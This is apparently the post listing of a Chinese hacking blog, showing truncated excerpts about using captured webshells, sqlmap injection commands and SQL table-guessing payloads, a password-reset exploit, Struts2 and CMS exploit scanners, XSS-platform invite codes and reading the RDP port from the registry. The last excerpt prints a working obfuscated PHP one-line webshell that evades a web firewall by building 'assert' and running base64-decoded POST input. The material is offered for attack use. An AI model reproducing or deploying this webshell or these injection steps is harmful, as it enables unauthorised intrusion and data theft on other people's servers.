以前的网站太卡了,这会儿换了主题,把之前的插件都换了,速度还是有点慢
当一名黑客获得一份WebShell后,会做什么?
当你获得一份webshell后,你会干嘛?我曾获得N多webshell。什么discuz、dedecms、phpwind、phpweb、aspcms等等,甚至还包括N多自己研发的线上平台。可是,问题来了,那么我能干嘛呢?很多人对“hacker”的理解就是:攻破某某大型平台、攻破XX计算机,黑首页、格盘、数据泄露、等等,想想就可怕当一家公司的数据出现……
实战密码重置漏洞 重置群英网络 任意账号(转载SSS安全论坛)
https://yunpan.cn/ckt9AaGIRa4rB 访问密码 4588 转载自SSS安全论坛原文地址:http://bbs.sssie.com/thread-1955-1-1.html……
XISE WBMS6免费分享
我对于这些没多少了解。刚才看到网盘里有就分享出来了。以前也发过一个。有相关介绍:http://blog.xiaohack.org/126.html解压密码:xiaohack.org……
Sqlmap注入技巧
php+mysql注入方法:http://tieba.baidu.com/p/3723202169http://www.cnblogs.com/Javame/p/3753060.html sqlmap命令大全1:access注入猜解表名 and exists (select * from admin)猜解列名 and exists(sel……
SQLmap注入笔记
sqlmap.py -u "url" --tables 列出数据库中的表( --tables:列出表)sqlmap.py -u "url" -T 表 --columns 列出表中字段-D:指定数据库名称-T:指定要列出字段的表--columns:指定列出字段sqlmap.py -u "url" -T userb -C "帐号,密码" --d……
分享一波SSS论坛旗下XSS平台邀请码
邀请码:6b0b2bb07869e0237c5494926b5e743f948ad54762a50505494fe2b19aca371240aed53e73807ebd315ef2a61403aec475d9705ad3d4e249d35cf29d820247966946b7a6d74efde7798d4a26035b0350……
Apache OpenMeetings 会议系统getshell初探
Apache OpenMeetings 算是比较冷门的系统,国内比较少见,要么都在内网吧。根据已经发布的漏洞:Apache OpenMeetings ZIP文件路径遍历(穿越)漏洞(CVE-2016-0784)Apache OpenMeeting可预测密码重置令牌漏洞(CVE-2016-0783)存在理论上getshell的可行性;1. 本地搭建o……
常用CMS漏洞exp&poc批量扫描的python脚本
链接:http://pan.baidu.com/s/1qXZ0ryW 密码:t0vb seebug的pocsuite。。https://github.com/knownsec/Pocsuitehttps://github.com/rootphantomer/exp ……
网络资产信息扫描(F-NAScan)
网络资产信息扫描在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指……
URL采集工具分享(7KBscan)
你是否经常整夜失眠睡不着?你是否总是腰酸背痛四肢无力?你是否时常无精打采腰肢酸软?--如果是的,没错,那么你肯定是肾虚!我不是老中医治不了!但是,你是否还常常四处寻找一款URL采集神器呢?不用怕,深夜福利,大表哥 @一个小尼玛 荣誉出品的URL采集神器新鲜出炉,不要199,也不要9块9,今夜免费提供下载!7kbscan 7kbdomainui 2.……
吃饱饭跟我一起刷STR2吧【STR 2神器集合】
不管效果怎么样,看到的,收集的都发出来了,自己去测试。第一款、大家都丢出来了,我也丢一个效果图PHP代码< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==========================……
网络资产信息扫描(F-NAScan)
网络资产信息扫描在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指……
cmd读3389端口测试成功终结版
第1种:regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"然后type c:\\tsport.reg | find "PortNumber"然后16进制转10进制查明文;这个……
POC集合扫描框架Pocscan(支持被动式扫描)
Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC 按照官方规范编写的 Poc对目标域名进行漏洞扫描。提供了chrome浏览器插件,自动抓取页面的dns发到扫描后端.下载地址https://github.com/erevus-cn/pocscan/骚年,现在你就只……
一句话php木马 过狗
<?php if(isset($_REQUEST['hello'])){ $i[0] = 'asse'.'rt'; $array[] = $i; $key=str_replace("yBZ","",$_POST[ad]); $i[1]=base64_decode($key); $array[0][0]($i[1]); } ……
- 1
- 2